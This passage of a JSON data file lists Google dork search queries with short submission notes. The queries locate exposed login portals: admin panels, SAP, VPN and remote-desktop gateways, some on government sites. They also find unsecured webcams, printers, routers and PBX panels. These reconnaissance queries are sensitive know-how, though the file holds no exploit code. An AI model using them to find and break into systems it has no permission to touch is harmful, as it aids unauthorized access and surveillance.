SDT-CS3B1\"\r\n# Pages Containing Login Portals\r\n# Date:14/06/2022\r\n# Exploit Author: Yash Singh"}, {"dork": "inurl:\"ucp.php?mode=login\"", "description": "# Google Dork: inurl:\".php?cid=\"+intext:\"online+betting\"\r\n# Pages Containing Login Portals\r\n# Date:14/06/2022\r\n# Exploit Author: Reza Abasi"}, {"dork": "intitle:iDRAC* inurl:login.html", "description": "# Google Dork: intitle:iDRAC* inurl:login.html\r\n# Pages Containing Login Portals\r\n# Date:14/06/2022\r\n# Exploit Author: Javier Bernardo"}, {"dork": "Fwd: intitle:\"Web UI\" inurl:\"/cgi-bin/luci\"", "description": "# Google Dork: intitle:\"Web UI\" inurl:\"/cgi-bin/luci\"\r\n# Pages Containing Login Portals\r\n# Date:14/06/2022\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "inurl:/intranet/signup", "description": "# Google Dork: inurl:/intranet/signup\r\n# Pages Containing Login Portals\r\n# Date: 05/12/2021\r\n# Exploit Author: S Rahul"}, {"dork": "inurl:/admin/login.php intitle:(\"Iniciar sesion\" OR \"hacked\")", "description": "# Google Dork: inurl:/admin/login.php intitle:(\"Iniciar sesion\" OR \"hacked\")\r\n# Pages Containing Login Portals\r\n# Date: 07/12/2021\r\n# Exploit Author: David Bradette\r\n\r\n\r\n\r\n\r\nRegards,\r\n\r\n\r\n\r\nDavid Bradette\r\n\r\nInformation Technology Engineer\r\nE: info@davidbradette.com mailto:info@davidbradette.com | W:http://www.davidbradette.com\r\nCalgary, AB"}, {"dork": "inurl:\"*admin|login\" site: gov", "description": "# Google Dork: inurl:\"*admin|login\" site: gov\r\n# Files Containing Juicy Info\r\n# Date: 09/12/2021\r\n# Exploit Author: Raghava Raju"}, {"dork": "intitle:\"index of\" \" *admin-login.php \"", "description": "# Google Dork: intitle:\"index of\" \" *admin-login.php \"\r\n# Pages Containing Login Portals\r\n# Date:16/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "site:.com intitle:\"Admin portal\"", "description": "# Google Dork: site:.com intitle:\"Admin portal\"\r\n# Pages Containing Login Portals\r\n# Date: 20/12/2021\r\n# Exploit Author: Yuliia Danylovych"}, {"dork": "\"This system\" inurl:login", "description": "# Google Dork: \"This system\" inurl:login\r\n# Pages Containing Login Portals\r\n# Date:16/06/2022\r\n# Exploit Author: JadeWolf"}, {"dork": "intitle:\"SAP Web Application Server\" logon", "description": "# Google Dork: intitle:\"SAP Web Application Server\" logon\r\n# Pages Containing Login Portals\r\n# Date:16/06/2022\r\n# Exploit Author: Zayed AlJaberi"}, {"dork": "inurl:/sap/bc/webdynpro/ logon", "description": "# Google Search: inurl:/sap/bc/webdynpro/ logon\r\n# Pages Containing Login Portals\r\n# Date: 20/01/2022\r\n# Author: Zayed AlJaberi\r\n# Google Dork Description: SAP Web Application Server"}, {"dork": "intitle:\"Login. MicroStrategy\"", "description": "# Dork: intitle:\"Login. MicroStrategy\"\r\n# Page Containing Login Portals\r\n# Date: 30/03/2022\r\n# Exploit Author: Acmello"}, {"dork": "inurl:\"microstrategy/servlet/mstrweb\"", "description": "# Dork: inurl:\"microstrategy/servlet/mstrweb\"\r\n# Category: Page Containing Login Portals\r\n# Date: 30/03/2022\r\n# Exploit Author: Acmello"}, {"dork": "inurl:/RDWeb/Pages/en-US/ filetype:aspx ~login", "description": "# Dork: inurl:/RDWeb/Pages/en-US/ filetype:aspx ~login\r\n# Pages Containing Login Portals\r\n# Date: 4/15/2022\r\n# Exploit Author: Ronnie Bartwitz\r\n# Description: A basic Google Dork to enumerate Remote Desktop gateways. Note that some may be locked behind Microsoft 365/AzureAD."}, {"dork": "intitle:\"ST Web Client\"", "description": "# Google Dork: intitle:\"ST Web Client\"\r\n# Pages Containing Login Portals\r\n# Date: 20/04/2021\r\n# Exploit Author: Nathan Cavitt"}, {"dork": "inurl:\"/sap/admin/public\"", "description": "# Google Dork: inurl:\"/sap/admin/public\"\r\n# Pages Containing Login Portals\r\n# Date: 18/06/2021\r\n# Exploit Author: Pablo Salinas"}, {"dork": "sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html -site:sap.com", "description": "# Google Dork: sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html -site:sap.com\r\n# Pages Containing Login Portals\r\n# Date: 18/06/2022\r\n# Exploit Author: Pablo Salinas"}, {"dork": "intitle:[TM4Web] inurl:login.msw", "description": "# Google Dork: intitle:[TM4Web] inurl:login.msw\r\n# Pages Containing Login Portals\r\n# Date:01/07/2022\r\n# Exploit Author: Lutzenfried"}, {"dork": "inurl:\"opac/login \" site:.edu", "description": "#Google Dork : inurl:\"opac/login \" site:.edu\r\n#Pages Containing Login Portals\r\n#Date : 04/07/2022\r\n#Exploit Author : nafih zain"}, {"dork": "Fwd: site:*/opac/login", "description": "# Google Dork: Fwd: site:*/opac/login\r\n# Pages Containing Login Portals\r\n# Date:06/07/2022\r\n# Exploit Author: nafih zain"}, {"dork": "intitle:\"JupyterHub\" inurl:/hub/login", "description": "# Google Dork: intitle:\"JupyterHub\" inurl:/hub/login\r\n# Category: Pages Containing Login Portals\r\n# Date: 18/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:\"/index.php?qa=login\"", "description": "Google Dork: inurl:\"/index.php?qa=login\"\r\n# Pages Containing Login Portals\r\n# Date:18/07/2022\r\n# Exploit Author: Reza Abasi"}, {"dork": "intitle:\"Login\" -com \"/doc/page/login.asp\"", "description": "# Google Dork: intitle:\"Login\" -com \"/doc/page/login.asp\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 14/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:_admin \"login\"", "description": "# Google Dork: inurl:_admin \"login\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 18/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Login page for\" inurl:user.cgi", "description": "# Google Dork: intitle:\"Login page for\" inurl:user.cgi\r\n# Category: Pages Containing Login Portals\r\n# Date: 20/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intext:\"change your SurgeMAIL account settings\"", "description": "# Google Dork: intext:\"change your SurgeMAIL account settings\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 20/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Oracle Access Management\" \"login\" -inurl:oracle", "description": "# Google Dork: intitle:\"Oracle Access Management\" \"login\" -inurl:oracle\r\n# Category: Pages Containing Login Portals\r\n# Date: 20/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Login to Redash\"", "description": "# Google Dork: intitle:\"Login to Redash\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 20/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Login to ICC PRO system\"", "description": "# Google Dork: intitle:\"Login to ICC PRO system\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 20/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Login - Residential Gateway\"", "description": "Google Dork: intitle:\"Login - Residential Gateway\"\r\n# Pages Containing Login Portals\r\n# Date: 20/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"System Administration\" inurl:top.cgi", "description": "#Google Dork: intitle:\"System Administration\" inurl:top.cgi\r\n# Pages Containing Login Portals\r\n# Date:20/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "Dork for Employees Self Service(ESS) Login Portals", "description": "# Google Dork: intext:ESS inurl:login\r\n# Pages Containing Login Portals\r\n# Date:20/07/2022\r\n# Exploit Author: Shiva Medituru"}, {"dork": "inurl:443 ext:php inurl:login", "description": "# Google Dork: inurl:443 ext:php inurl:login\r\n# Pages Containing Login Portals\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "inurl:http ext:php inurl:login", "description": "# Google Dork: inurl:http ext:php inurl:login\r\n# Pages Containing Login Portals\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intitle:\"Device(IP CAMERA)\" \"language\" -com|net", "description": "# Google Dork: intitle:\"Device(IP CAMERA)\" \"language\" -com|net\r\n# Pages Containing Login Portals\r\n# Date:25/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intext:\"login to authorize\" \"DynDNS\"", "description": "# intext:\"login to authorize\" \"DynDNS\"\r\n# Pages Containing Login Portals\r\n# Date:25/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Synnefo Admin\"", "description": "# Google Dork: intitle:\"Synnefo Admin\"\r\n# Pages Containing Login Portals\r\n# Date:25/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:_admin \"login.aspx\"", "description": "# Google Dork: inurl:_admin \"login.aspx\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 25/07/2022\r\n# Exploit Author: MAHIN VM"}, {"dork": "intitle:\"User Authentication : IR*\"", "description": "# Google Dork: intitle:\"User Authentication : IR*\"\r\n# Pages Containing Login Portals\r\n# Date:25/07/2022\r\n# Exploit Author: Luke Stark"}, {"dork": "intitle:'olt web management interface'", "description": "# Google Dork: intitle:'olt web management interface'\r\n# Pages Containing Login Portals\r\n# Date: 08/07/2021 \r\n# Exploit Author: Cyber Shelby"}, {"dork": "inurl:\"admin/default.aspx\"", "description": "# Google Dork: inurl:\"admin/default.aspx\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 07/08/2022\r\n# Exploit Author: Payal Yedhu"}, {"dork": "allintitle:\"Log on to MACH-ProWeb\"", "description": "# Google Dork: allintitle:\"Log on to MACH-ProWeb\"\r\n# Pages Containing Login Portals\r\n# Date: 13/08/2022\r\n# Exploit Author: HackerFrenzy"}, {"dork": "intitle:\"WEB SERVICE\" \"wan\" \"lan\" \"alarm\"", "description": "# Google Dork: intitle:\"WEB SERVICE\" \"wan\" \"lan\" \"alarm\"\r\n# Pages Containing Login Portals\r\n# Date: 14/08/2022 \r\n# Exploit Author: Heverin Hacker"}, {"dork": "inurl:authorization.do intext:\"ADSelfService Plus\"", "description": "# Google Dork: inurl:authorization.do intext:\"ADSelfService Plus\"\r\n# Pages Containing Login Portals\r\n# Date:31/01/2023\r\n# Exploit Author: Stuart Steenberg"}, {"dork": "intitle:\"NB1601 Web Manager\"", "description": "# Google Dork: intitle:\"NB1601 Web Manager\"\r\n# Pages Containing Login Portals\r\n# Date:31/01/2023\r\n# Exploit Author: HackerFrenzy"}, {"dork": "intitle:\"Netgate pfSense Plus - Login\"", "description": "# Google Dork: intitle:\"Netgate pfSense Plus - Login\"\r\n# Pages Containing Login Portals\r\n# Date:31/01/2023\r\n# Exploit Author: HackerFrenzy"}, {"dork": "intitle:\"Parallels User Portal\"", "description": "# Google Dork: intitle:\"Parallels User Portal\"\r\n# Pages Containing Login Portals\r\n# Date:31/01/2023\r\n# Exploit Author: HackerFrenzy"}, {"dork": "allintitle:\"wireless controller login\"", "description": "# Google Dork: allintitle:\"wireless controller login\"\r\n# Pages Containing Login Portals\r\n# Date:31/01/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "inurl:\"/adfs/ls/\"", "description": "# Google Dork: inurl:\"/adfs/ls/\"\r\n# Pages Containing Login Portals\r\n# Date:31/01/2023\r\n# Exploit Author: Lorenzo Albano Fontanot"}, {"dork": "inurl:\"device.rsp\" -com", "description": "# Google Dork: inurl:\"device.rsp\" -com\r\n# Pages Containing Login Portals\r\n# Date:2/1/2023\r\n# Exploit Author: Simone Gasparato"}, {"dork": "site:cp.*.* intitle:\"login\"", "description": "# Google Dork: site:cp.*.* intitle:\"login\"\r\n# Pages Containing Login Portals\r\n# Date: 31/10/2022\r\n# Exploit Author: Reza Abasi"}, {"dork": "inurl:assystnetmob", "description": "# Google Dork: inurl:assystnetmob\r\n# Pages Containing Login Portals\r\n# Date:13/02/2023\r\n# Exploit Author: Zayed AlJaberi"}, {"dork": "intitle:\"index of\" \"login.sh\"", "description": "# Google Dork: intitle:\"index of\" \"login.sh\"\r\n# Pages Containing Login Portals\r\n# Date:13/02/2023\r\n# Exploit Author: Anoop Kumar"}, {"dork": "site:*/AdminLogin.aspx", "description": "# Google Dork: site:*/AdminLogin.aspx\r\n# Pages Containing Login Portals\r\n# Date:15/02/2023\r\n# Exploit Author: Reza Abasi"}, {"dork": "inurl:GeminiVAIdServer", "description": "# Google Dork: inurl:GeminiVAIdServer\r\n# Pages Containing Login Portals\r\n# Date:22/02/2023\r\n# Exploit Author: Prayag Mathukiya"}, {"dork": "inurl:GeminiVAIdServer", "description": "# Google Dork: inurl:GeminiVAIdServer\r\n# Pages Containing Login Portals\r\n# Date:22/02/2023\r\n# Exploit Author: Prayag Mathukiya"}, {"dork": "intitle:\"Ignition Gateway\" \"launch designer\"", "description": "# Google Dork: intitle:\"Ignition Gateway\" \"launch designer\"\r\n# Pages Containing Login Portals\r\n# Date:24/02/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "site:ap.*.* intitle:\"login\"", "description": "# Google Dork: site:ap.*.* intitle:\"login\"\r\n# Pages Containing Login Portals\r\n# Date:24/02/2023\r\n# Exploit Author: Sanu Jose M"}, {"dork": "allintitle:\"Eclypse Login\"", "description": "# Google Dork: allintitle:\"Eclypse Login\"\r\n# Pages Containing Login Portals\r\n# Date:27/02/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "allintitle:\"TutorTrac Login\"", "description": "# Google Dork: allintitle:\"TutorTrac Login\"\r\n# Pages Containing Login Portals\r\n# Date:27/02/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "allintitle:\"OMERO.web - Login\"", "description": "# Google Dork: allintitle:\"OMERO.web - Login\"\r\n# Pages Containing Login Portals\r\n# Date:27/02/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "allintitle:\"Untangle Administrator Login\"", "description": "# Google Dork: allintitle:\"Untangle Administrator Login\"\r\n# Pages Containing Login Portals\r\n# Date:27/02/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "allintitle:\"eSlideManager - Login\"", "description": "# Google Dork: allintitle:\"eSlideManager - Login\"\r\n# Pages Containing Login Portals\r\n# Date:27/02/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "allintitle:\"Supermicro BMC Login\"", "description": "# Google Dork: allintitle:\"Supermicro BMC Login\"\r\n# Pages Containing Login Portals\r\n# Date:27/02/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "allintitle:\"Building Operation WebStation\"", "description": "# Google Dork: allintitle:\"Building Operation WebStation\"\r\n# Pages Containing Login Portals\r\n# Date:27/02/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "site:email.*.* intitle:\"login\"", "description": "# Google Dork: site:email.*.* intitle:\"login\"\r\n# Pages Containing Login Portals\r\n# Date:28/02/2023\r\n# Exploit Author: Reza Abasi"}, {"dork": "allintitle:\"Cyberoam SSL VPN Portal\"", "description": "# Google Dork: allintitle:\"Cyberoam SSL VPN Portal\"\r\n# Pages Containing Login Portals\r\n# Date:07/03/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "inurl:guest/auth_login.php", "description": "# Google Dork: inurl:guest/auth_login.php\r\n# Pages Containing Login Portals\r\n# Date:16/03/2023\r\n# Exploit Author: Javier Bernardo"}, {"dork": "allintitle:\"Login | Control WebPanel\" Control WebPanel Login", "description": "# Google Dork: allintitle:\"Login | Control WebPanel\" Control WebPanel Login\r\n# Pages Containing Login Portals\r\n# Date:16/03/2023\r\n# Exploit Author: Aditya Raj Singh"}, {"dork": "inurl:adminpanel site:*.in", "description": "# Google Dork: inurl:adminpanel site:*.in\r\n# Pages Containing Login Portals\r\n# Date:24/03/2023\r\n# Exploit Author: Md rofikul"}, {"dork": "allintitle:\"MobileIron User Portal: Sign In\"", "description": "# Google Dork: allintitle:\"MobileIron User Portal: Sign In\"\r\n# Pages Containing Login Portals\r\n# Date:29/03/2023\r\n# Exploit Author: Heverin Hacker"}, {"dork": "allintitle:\"Synapse Mobility Login\"", "description": "# Google Dork: allintitle:\"Synapse Mobility Login\"\r\n# Pages Containing Login Portals\r\n# Date:29/03/2023\r\n# Exploit Author: Heverin Hacker"}, {"dork": "allintitle:\"ResolutionMD Login\"", "description": "# Google Dork: allintitle:\"ResolutionMD Login\"\r\n# Pages Containing Login Portals\r\n# Date:29/03/2023\r\n# Exploit Author: Heverin Hacker"}, {"dork": "inurl:/superadmin/login intext:login", "description": "# Google Dork: inurl:/superadmin/login intext:login\r\n# Pages Containing Login Portals\r\n# Date:06/04/2023\r\n# Exploit Author: Himanshu Mehta"}, {"dork": "inurl:\"/sap/bc/gui/sap/its/webgui?sap-client=SAP*\"", "description": "# Google Dork: inurl:\"/sap/bc/gui/sap/its/webgui?sap-client=SAP*\"\r\n# Pages Containing Login Portals\r\n# Date:06/04/2023\r\n# Exploit Author: Leonardo Venegas"}, {"dork": "allintitle:\"Login | wplogin Login", "description": "# Google Dork: allintitle:\"Login | wplogin Login\r\n# Pages Containing Login Portals\r\n# Date: 06/04/2023\r\n# Exploit Author: MD Hasib"}, {"dork": "inurl:cas/login?service=http", "description": "# Google Dork: inurl:cas/login?service=http\r\n# Pages Containing Login Portals\r\n# Date:17/04/2023\r\n# Exploit Author: Stuart Steenberg"}, {"dork": "inurl: \"/admin\" intitle:\"Admin Login\"", "description": "# Google Dork: inurl: \"/admin\" intitle:\"Admin Login\"\r\n# Pages Containing Login Portals\r\n# Date:20/04/2023\r\n# Exploit Author: Bhavin Amesara"}, {"dork": "allintitle:\"Opengear Management Console\"", "description": "# Google Dork: allintitle:\"Opengear Management Console\"\r\n# Pages Containing Login Portals\r\n# Date:05/05/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "Re: inurl:\"/user\" intitle:\"userlogin\"", "description": "# Google Dork: inurl:\"/user\" intitle:\"userlogin\"\r\n# Pages Containing Login Portals\r\n# Date:31/05/2023\r\n# Exploit Author: Ishak Hasan Sabbir"}, {"dork": "Re: inurl:\"/admin\" intitle:\"adminlogin\"", "description": "# Google Dork: inurl:\"/admin\" intitle:\"adminlogin\"\r\n# Pages Containing Login Portals\r\n# Date:31/05/2023\r\n# Exploit Author: Ishak Hasan Sabbir"}, {"dork": "inurl:\"/login.aspx\" intitle:\"adminlogin\"", "description": "# Google Dork: inurl:\"/login.aspx\" intitle:\"adminlogin\"\r\n# Pages Containing Login Portals\r\n# Date:02/06/2023\r\n# Exploit Author: Sachin Gupta"}, {"dork": "inurl:\"/login.aspx\" intitle:\"user\"", "description": "# Google Dork: inurl:\"/login.aspx\" intitle:\"user\"\r\n# Pages Containing Login Portals\r\n# Date:02/06/2023\r\n# Exploit Author: Sachin Gupta"}, {"dork": "intitle:\"PaperCut login\"", "description": "# Google Dork: intitle:\"PaperCut login\"\r\n# Pages Containing Login Portals\r\n# Date:02/06/2023\r\n# Exploit Author: SatishKumar Pyata"}, {"dork": "site:co.in inurl:/login.aspx", "description": "# Google Dork: site:co.in inurl:/login.aspx\r\n# Pages Containing Login Portals\r\n# Date: 04/07/2023\r\n# Exploit Author: Sachin Gupta"}, {"dork": "site:co.in inurl:/admin.aspx", "description": "# Google Dork: site:co.in inurl:/admin.aspx\r\n# Pages Containing Login Portals\r\n# Date: 04/07/2023\r\n# Exploit Author: Sachin Gupta"}, {"dork": "site:.org inurl:/admin.aspx", "description": "# Google Dork: site:.org inurl:/admin.aspx\r\n# Pages Containing Login Portals\r\n# Date: 04/07/2023\r\n# Exploit Author: Sachin Gupta"}, {"dork": "site:.org inurl:/login.aspx", "description": "# Google Dork: site:.org inurl:/login.aspx\r\n# Pages Containing Login Portals\r\n# Date: 04/07/2023\r\n# Exploit Author: Sachin Gupta"}, {"dork": "site:.com inurl:/login.aspx", "description": "# Google Dork: site:.com inurl:/login.aspx\r\n# Pages Containing Login Portals\r\n# Date: 04/07/2023\r\n# Exploit Author: Sachin Gupta"}, {"dork": "inurl:uux.aspx", "description": "# Google Dork: inurl:uux.aspx\r\n# Pages Containing Login Portals\r\n# Date: 28/07/2023\r\n# Exploit Author: Javier Bernardo"}, {"dork": "inurl:tech \"login\"", "description": "\ufeffGoogle Dork: inurl:tech \"login\"\r\n# Pages Containing Login Portals\r\n# Date: 11/09/2023\r\n# Exploit Ivan Nizer Gonsalves"}, {"dork": "inurl:\"adminLogin/\" intitle:\"Admin Panel\"", "description": "# Google Dork: inurl:\"adminLogin/\" intitle:\"Admin Panel\"\r\n# Pages Containing Login Portals\r\n# Date: 11/09/2023\r\n# Exploit Author: Jose Rivas Aka. Bl4cksku11"}, {"dork": "intext:\"Login\" inurl:/secure", "description": "# Google Dork: intext:\"Login\" inurl:/secure\r\n# Pages Containing Login Portals\r\n# Date: 11/09/2023\r\n# Exploit Shubhranshu Gorai"}, {"dork": "admin panel and open server misconfigure", "description": "# Google Dork: inurl:\"/login.aspx\" intitle:\"user\" intext:\"admin\"\r\n# Pages Containing Login Portals\r\n# Date: 02/10/2023\r\n# Exploit Momin Monis"}, {"dork": "allintitle: \"smart office suite - login page\"", "description": "# Google Dork: allintitle: \"smart office suite - login page\"\r\n# Pages Containing Login Portals\r\n# Date: 02/10/2023\r\n# Exploit Abhilash Gangane"}, {"dork": "Shopping Website Login Pages", "description": "# Google Dork: Shopping Website Login Pages\r\n# Pages Containing Login Portals\r\n# Date: 13/10/2023\r\n# Exploit Prathamesh Kamble"}, {"dork": "inurl:\"/spotfire/login.html\"", "description": "# Google Dork: inurl:\"/spotfire/login.html\"\r\n# Pages Containing Login Portals\r\n# Date: 16/10/2023\r\n# Exploit Chinmay Divekar"}, {"dork": "inurl:/ui/login.aspx", "description": "# Google Dork: inurl:/ui/login.aspx\r\n# Pages Containing Login Portals\r\n# Date: 18/10/2023\r\n# Exploit Nishchayjeet Singh"}, {"dork": "intitle:\"online portal login\"", "description": "# Google Dork: intitle:\"online portal login\"\r\n# Pages Containing Login Portals\r\n# Date:19/10/2023\r\n# Exploit Author: Safein Sadad"}, {"dork": "initial:inurl:uux.aspx", "description": "# Google Dork: initial:inurl:uux.aspx\r\n# Pages Containing Login Portals\r\n# Date:19/10/2023\r\n# Exploit Author: Abdullah Al Maksud"}, {"dork": "intitle:\"Unibox Administration\"", "description": "# Google Dork: intitle:\"Unibox Administration\"\r\n# Pages Containing Login Portals\r\n# Date: 25/10/2023\r\n# Exploit Hetkumar Desai"}, {"dork": "Submitting a google dork.", "description": "# Google Dork: inurl:\"/login.aspx\" intitle:\"pass\".\r\n# Pages Containing Login Portals\r\n# Date: 30/10/2023\r\n# Exploit swara kalsekar"}, {"dork": "site:..us inurl:\"login.php\"", "description": "# Google Dork: site:..us inurl:\"login.php\"\r\n# Pages Containing Login Portals\r\n# Date: 30/10/2023\r\n# Exploit Husain Ahmad"}, {"dork": "intitle:\"Login - Jorani\"", "description": "# Google Dork: intitle:\"Login - Jorani\"\r\n# Pages Containing Login Portals\r\n# Date: 31/10/2023\r\n# Exploit Bipin Jitiya"}, {"dork": "inurl:/restgui/start.html", "description": "# Google Dork: inurl:/restgui/start.html\r\n# Pages Containing Login Portals\r\n# Date: 01/11/2023\r\n# Exploit: Louise E"}, {"dork": "intitle:\"cs141 webmanager\"", "description": "# Google Dork: intitle:\"cs141 webmanager\"\r\n# Pages Containing Login Portals\r\n# Date: 01/11/2023\r\n# Exploit: Louise E"}, {"dork": "site:.com inurl:login | inurl:logon | inurl:sign-in | inurl:signin | inurl:portal", "description": "# Google Dork: site:.com inurl:login | inurl:logon | inurl:sign-in | inurl:signin | inurl:portal\r\n# Pages Containing Login Portals\r\n# Date: 07/11/2023\r\n# Exploit: Qais Qais"}, {"dork": "site:login.*.* site:portal.*.*", "description": "# Google Dork: site:login.*.* site:portal.*.*\r\n# Pages Containing Login Portals\r\n# Date: 09/11/2023\r\n# Exploit: Anas Zakir"}, {"dork": "site:admin.*.* inurl:login", "description": "# Google Dork: site:admin.*.* inurl:login\r\n# Pages Containing Login Portals\r\n# Date: 10/11/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "site:prod.*.* inurl:login", "description": "# Google Dork: site:prod.*.* inurl:login\r\n# Pages Containing Login Portals\r\n# Date: 10/11/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "allintitle:\"ASPECT Control Panel\"", "description": "# Google Dork: allintitle:\"ASPECT Control Panel\"\r\n# Pages Containing Login Portals\r\n# Date: 11/12/2023\r\n# Exploit: Thomas Heverin"}, {"dork": "allintitle:\"CAT12CE - WebInterface\"", "description": "# Google Dork: allintitle:\"CAT12CE - WebInterface\"\r\n# Pages Containing Login Portals\r\n# Date: 11/12/2023\r\n# Exploit: Thomas Heverin"}, {"dork": "allintitle:\"code-server login\"", "description": "# Google Dork: allintitle:\"code-server login\"\r\n# Pages Containing Login Portals\r\n# Date: 11/12/2023\r\n# Exploit: Thomas Heverin"}, {"dork": "inurl:\"UserLogin/\" intitle:\"Panel\"", "description": "# Google Dork: inurl:\"UserLogin/\" intitle:\"Panel\"\r\n# Pages Containing Login Portals\r\n# Date: 11/12/2023\r\n# Exploit: saurabh kode"}], "Various Online Devices": [{"dork": "intitle:\"remote ui:top page\"", "description": "The \"large\" Canon ImageReady machines with model versions 3300, 5000 & 60000."}, {"dork": "inurl:hp/device/this.LCDispatcher", "description": "This one gets you on the web interface of some more HP Printers."}, {"dork": "intitle:webeye inurl:login.ml", "description": "This one gets you on the webinterface of Webeye webcams."}, {"dork": "intitle:\"DEFAULT_CONFIG - HP\"", "description": "searches for the web interface of HP switches."}, {"dork": "camera linksys inurl:main.cgi", "description": "Another webcam, Linksys style."}, {"dork": "intitle:\"my webcamXP server!\" inurl:\":8080\"", "description": "\"my webcamXP server!\"Is there really an explantation needed?"}, {"dork": "intitle:\"toshiba network camera - User Login\"", "description": "Web interface of Toshiba network cameras."}, {"dork": "\"please visit\" intitle:\"i-Catcher Console\" Copyright \"iCode Systems\"", "description": "CCTV webcams by ICode."}, {"dork": "intext:\"Ready with 10/100T Ethernet\"", "description": "Xerox 860 and 8200 Printers."}, {"dork": "intext:\"UAA (MSB)\" Lexmark -ext:pdf", "description": "Lexmark printers (T620, T522, Optra T614, E323, T622, Optra T610, Optra T616, T520 and Optra S 1855)"}, {"dork": "\"Starting SiteZAP 6.0\"", "description": "siteZap webcams !"}, {"dork": "intitle:\"EvoCam\" inurl:\"webcam.html\"", "description": "Evocams !"}, {"dork": "intext:\"Videoconference Management System\" ext:htm", "description": "Tandberg video conferencing appliancesThe webinterface enables you to drop calls and to browse the internal phonebook"}, {"dork": "\"Copyright (c) Tektronix, Inc.\" \"printer status\"", "description": "Captain, the Phasers are online :)"}, {"dork": "intext:\"MaiLinX Alert (Notify)\" -site:networkprinters.com", "description": "Xerox DocuPrint printer models."}, {"dork": "inurl:\"printer/main.html\" intext:\"settings\"", "description": "Brother HL Printers."}, {"dork": "intitle:\"Live NetSnap Cam-Server feed\"", "description": "Netsnap Online Cameras"}, {"dork": "intitle:\"V-Gear BEE\"", "description": "V-Gear Bee Web Cameras"}, {"dork": "intitle:\"iVISTA.Main.Page\"", "description": "And again another webcam search. MOst of these cams seem to be security cams"}, {"dork": "intitle:\"SpeedStream * Management Interface\"", "description": "a lot of Speed stream routers :)"}, {"dork": "inurl:\"next_file=main_fs.htm\" inurl:img inurl:image.cgi", "description": "Linksys Wireless-G web cams."}, {"dork": "intitle:\"Network Print Server\" filetype:shtm ( inurl:u_printjobs | inurl:u_server | inurl:a_server | inurl:u_generalhelp | u_printjobs )", "description": "Axis Network Print Server devices. This search has all the possible urls (more than strictly needed), but those are added in case Google decides to index them in the future."}, {"dork": "intitle:\"Network Print Server\" intext:\"http://www.axis.com\" filetype:shtm", "description": "Axis Network Print Server devices (a better shorter search)."}, {"dork": "intitle:\"Browser Launch Page\"", "description": "An ActiveX based webcam - so use MS IE"}, {"dork": "intitle:\"EpsonNet WebAssist Rev\"", "description": "This reveals the Epson Web Assist page (internal to the machine)"}, {"dork": "intitle:\"Brother\" intext:\"View Configuration\" intext:\"Brother Industries, Ltd.\"", "description": "Finds a real bunch of Brother printers"}, {"dork": "intitle:\"switch login\" \"IBM Fast Ethernet Desktop\"", "description": "IBM 8275 Model 416 High Performance Ethernet Workgroup Switch"}, {"dork": "intitle:Linksys site:ourlinksys.com", "description": "Ourlinksys.com DDNS entries pointing to Linksys web enabled cameras"}, {"dork": "intext:\"Please enter correct password for Administrator Access. Thank you\" \"Copyright \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2003 SMC Networks, Inc. All rights reserved.\"", "description": "Finds SMC Routers."}, {"dork": "inurl:camctrl.cgi", "description": "Vivotec web cams"}, {"dork": "intitle:\"active webcam page\"", "description": "searches for \"Active Webcam\" feeds on websites, a popular USB webcam interface."}, {"dork": "intitle:HomeSeer.Web.Control | Home.Status.Events.Log", "description": "HomeSeer (http://www.homeseer.com/) provides a well known home automation solution (software + hardware)This dork will find web interfaces of homeseer."}, {"dork": "intitle:\"Flash Operator Panel\" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists", "description": "Flash Operator Panel is a switchboard type application for the Asterisk PBX. It runs on a web browser with the flash plugin. It is able to display information about your PBX activity in real time."}, {"dork": "intitle:\"Service Managed Gateway Login\"", "description": "service Managed Gateway from VirtualAccess login page"}, {"dork": "intitle:\"actiontec\" main setup status \"Copyright 2001 Actiontec Electronics Inc\"", "description": "Actiontec Routers."}, {"dork": "\"Webthru User Login\"", "description": "samsung webthru cameras"}, {"dork": "intitle:\"OfficeConnect Wireless 11g Access Point\" \"Checking your browser\"", "description": "OfficeConnect Wireless 11g Access Point"}, {"dork": "intitle:\"Lexmark *\" inurl:port_0", "description": 